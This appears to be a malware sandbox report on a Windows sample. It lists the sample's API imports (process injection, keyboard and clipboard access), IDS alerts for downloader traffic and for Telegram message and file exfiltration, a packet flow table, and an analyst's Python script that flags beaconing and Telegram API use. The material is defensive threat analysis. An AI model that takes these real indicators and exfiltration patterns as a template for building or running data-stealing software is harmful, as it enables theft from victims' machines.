KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, 
OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T20:37:43.004704+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49710 | 132.226.247.73 | 80 | TCP
2025-01-10T20:37:43.973459+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49710 | 132.226.247.73 | 80 | TCP
2025-01-10T20:37:44.567549+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49712 | 104.21.112.1 | 443 | TCP
2025-01-10T20:37:45.301557+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49714 | 132.226.247.73 | 80 | TCP
2025-01-10T20:37:45.923744+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49715 | 104.21.112.1 | 443 | TCP
2025-01-10T20:37:54.985464+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49787 | 149.154.167.220 | 443 | TCP
2025-01-10T20:38:01.291299+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.6 | 49830 | 149.154.167.220 | 443 | TCP
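The IDS alerts above and the flow table that follows tell the same story from two angles: a run of short HTTP connections to 132.226.247.73:80, each paired with a TLS connection to 104.21.112.1:443, about 1.3 s apart, followed by two TLS connections to 149.154.167.220 that the Joe Security rules label as Telegram "Send Message" and "Send File". The script below is an added example of how an analyst would reduce such a flow table to per-destination connection counts, the median gap between consecutive connections (a beaconing indicator), and a Telegram-API flag; it is my code, not Joe Sandbox output. It assumes rows in the cleaned "timestamp | source port | dest port | source IP | dest IP" form, that 192.168.2.6 is the analysis host, and that 149.154.160.0/20 is a Telegram-announced prefix (the 149.154.167.220 address above falls in it). The embedded sample is constructed from the report's own data: the first packet of each client-initiated connection in the flow table, plus the two Telegram connections with the timestamps taken from the IDS alert table.

```python
"""Summarise client-initiated connections in a sandbox flow table: connections
per destination, median gap between them (beaconing) and a Telegram-API flag.
Added example for this report; not Joe Sandbox code."""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network
from statistics import median

# Assumption: Telegram-announced prefix that api.telegram.org answers from.
# Extend with further Telegram prefixes if your environment needs them.
TELEGRAM_NETS = (ip_network("149.154.160.0/20"),)

# Constructed sample: first packet of each connection the client opened in the
# report's flow table, plus the two Telegram connections using the IDS alert
# timestamps.  Format: timestamp | sport | dport | src | dst
SAMPLE_FLOWS = """\
Jan 10, 2025 20:37:41.975191116 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:43.006278038 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.920006037 CET | 49712 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:44.572899103 CET | 49714 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:45.255435944 CET | 49715 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:45.929053068 CET | 49721 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:46.778824091 CET | 49727 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:47.374634981 CET | 49733 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:48.084465027 CET | 49739 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:48.720139027 CET | 49744 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:49.420516014 CET | 49750 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:50.056441069 CET | 49752 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:54.985464000 CET | 49787 | 443 | 192.168.2.6 | 149.154.167.220
Jan 10, 2025 20:38:01.291299000 CET | 49830 | 443 | 192.168.2.6 | 149.154.167.220
"""


def parse_flow_line(line: str) -> dict:
    """Parse one 'timestamp | sport | dport | src | dst' row."""
    ts, sport, dport, src, dst = (f.strip() for f in line.split("|"))
    # strptime's %f accepts at most six fractional digits; the report has nine.
    stamp, frac = ts.removesuffix(" CET").split(".")
    when = datetime.strptime(f"{stamp}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return {"when": when, "sport": int(sport), "dport": int(dport),
            "src": ip_address(src), "dst": ip_address(dst)}


def is_telegram(addr) -> bool:
    """True if addr lies in one of the Telegram prefixes above."""
    return any(addr in net for net in TELEGRAM_NETS)


def summarize(flow_text: str, client: str = "192.168.2.6") -> list:
    """One record per (dst, dport): connections the client opened, the median
    seconds between consecutive ones, and whether dst is Telegram."""
    client_ip = ip_address(client)
    starts = defaultdict(list)
    for line in flow_text.splitlines():
        if not line.strip():
            continue
        f = parse_flow_line(line)
        if f["src"] == client_ip:  # keep client-initiated packets only
            starts[(f["dst"], f["dport"])].append(f["when"])
    rows = []
    for (dst, dport), times in starts.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        rows.append({"dst": str(dst), "dport": dport, "count": len(times),
                     "median_gap_s": round(median(gaps), 3) if gaps else None,
                     "telegram": is_telegram(dst)})
    return sorted(rows, key=lambda r: (-r["count"], r["dst"]))


if __name__ == "__main__":
    for r in summarize(SAMPLE_FLOWS):
        flag = "  <- Telegram API" if r["telegram"] else ""
        print(f"{r['dst']:>16}:{r['dport']:<4} conns={r['count']} "
              f"median_gap={r['median_gap_s']}s{flag}")
```

Run as-is it prints one line per destination; point `summarize` at a full export of the flow table to get the same view over the whole session. The median rather than the mean is used for the gap so that one long pause (the first HTTP connection here is 2.6 s before the second, the rest about 1.35 s apart) does not hide a regular beacon. Only packets whose source is the analysis host count, so server replies and retransmissions do not inflate the connection count.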
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 20:37:41.975191116 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:41.980026960 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:41.980118036 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:41.980315924 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:41.985094070 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:42.740592957 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:42.744561911 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:42.749521971 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:42.958389997 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:43.004703999 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:43.006278038 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.006323099 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.006395102 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.014946938 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.014971972 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.515481949 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.515613079 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.520729065 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.520739079 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.521050930 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.567152977 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.572674990 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.615334034 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.691633940 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.691698074 CET | 443 | 49711 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.691781044 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.698657990 CET | 49711 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.702404976 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:43.707252979 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:43.917732000 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:43.920006037 CET | 49712 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.920053005 CET | 443 | 49712 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.920120001 CET | 49712 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.920393944 CET | 49712 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:43.920408964 CET | 443 | 49712 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:43.973459005 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:44.397768974 CET | 443 | 49712 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:44.400316000 CET | 49712 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:44.400372982 CET | 443 | 49712 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:44.567576885 CET | 443 | 49712 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:44.567643881 CET | 443 | 49712 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:44.567697048 CET | 49712 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:44.568384886 CET | 49712 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:44.571739912 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:44.572899103 CET | 49714 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:44.576843023 CET | 80 | 49710 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:44.576922894 CET | 49710 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:44.577743053 CET | 80 | 49714 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:44.577830076 CET | 49714 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:44.578048944 CET | 49714 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:44.582863092 CET | 80 | 49714 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:45.253782988 CET | 80 | 49714 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:45.255435944 CET | 49715 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:45.255486965 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:45.255547047 CET | 49715 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:45.255846977 CET | 49715 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:45.255858898 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:45.301557064 CET | 49714 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:45.753170013 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:45.754930019 CET | 49715 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:45.754962921 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:45.923747063 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:45.923809052 CET | 443 | 49715 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:45.923898935 CET | 49715 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:45.924295902 CET | 49715 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:45.929053068 CET | 49721 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:45.933898926 CET | 80 | 49721 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:45.933976889 CET | 49721 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:45.934077024 CET | 49721 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:45.938870907 CET | 80 | 49721 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:46.777050972 CET | 80 | 49721 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:46.778824091 CET | 49727 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:46.778867960 CET | 443 | 49727 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:46.778955936 CET | 49727 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:46.779333115 CET | 49727 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:46.779345036 CET | 443 | 49727 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:46.817177057 CET | 49721 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:47.233092070 CET | 443 | 49727 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:47.235757113 CET | 49727 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:47.235791922 CET | 443 | 49727 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:47.369427919 CET | 443 | 49727 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:47.369498014 CET | 443 | 49727 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:47.369575024 CET | 49727 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:47.370121002 CET | 49727 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:47.374044895 CET | 49721 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:47.374634981 CET | 49733 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:47.379271030 CET | 80 | 49721 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:47.379339933 CET | 49721 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:47.379388094 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:47.379471064 CET | 49733 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:47.379661083 CET | 49733 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:47.384375095 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:48.083070040 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:48.084465027 CET | 49739 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:48.084506989 CET | 443 | 49739 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:48.084602118 CET | 49739 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:48.084857941 CET | 49739 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:48.084873915 CET | 443 | 49739 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:48.129658937 CET | 49733 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:48.545070887 CET | 443 | 49739 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:48.546646118 CET | 49739 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:48.546664953 CET | 443 | 49739 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:48.714903116 CET | 443 | 49739 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:48.714962006 CET | 443 | 49739 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:48.715048075 CET | 49739 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:48.715594053 CET | 49739 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:48.718874931 CET | 49733 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:48.720139027 CET | 49744 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:48.724081993 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:48.724132061 CET | 49733 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:48.724951982 CET | 80 | 49744 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:48.725032091 CET | 49744 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:48.725141048 CET | 49744 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:48.729866982 CET | 80 | 49744 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:49.419161081 CET | 80 | 49744 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:49.420516014 CET | 49750 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:49.420567036 CET | 443 | 49750 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:49.420639992 CET | 49750 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:49.421010971 CET | 49750 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:49.421024084 CET | 443 | 49750 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:49.464437962 CET | 49744 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:49.901447058 CET | 443 | 49750 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:49.903245926 CET | 49750 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:49.903285980 CET | 443 | 49750 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:50.050651073 CET | 443 | 49750 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:50.050700903 CET | 443 | 49750 | 104.21.112.1 | 192.168.2.6
Jan 10, 2025 20:37:50.050745964 CET | 49750 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:50.051192045 CET | 49750 | 443 | 192.168.2.6 | 104.21.112.1
Jan 10, 2025 20:37:50.055866003 CET | 49744 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:50.056441069 CET | 49752 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:50.060977936 CET | 80 | 49744 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:50.061023951 CET | 49744 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:50.061244965 CET | 80 | 49752 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:50.061304092 CET | 49752 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:50.061391115 CET | 49752 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 20:37:50.066145897 CET | 80 | 49752 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:50.861355066 CET | 80 | 49752 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 20:37:50.862911940 CET | 49758 | 443 | 192.168.2.6 | 104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.862976074 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.863074064 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.863369942 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:50.863389969 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:50.910914898 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.333025932 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.334790945 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:51.334821939 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.468414068 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.468483925 CET44349758104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.468547106 CET49758443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:51.469043970 CET49758443192.168.2.6104.21.112.1
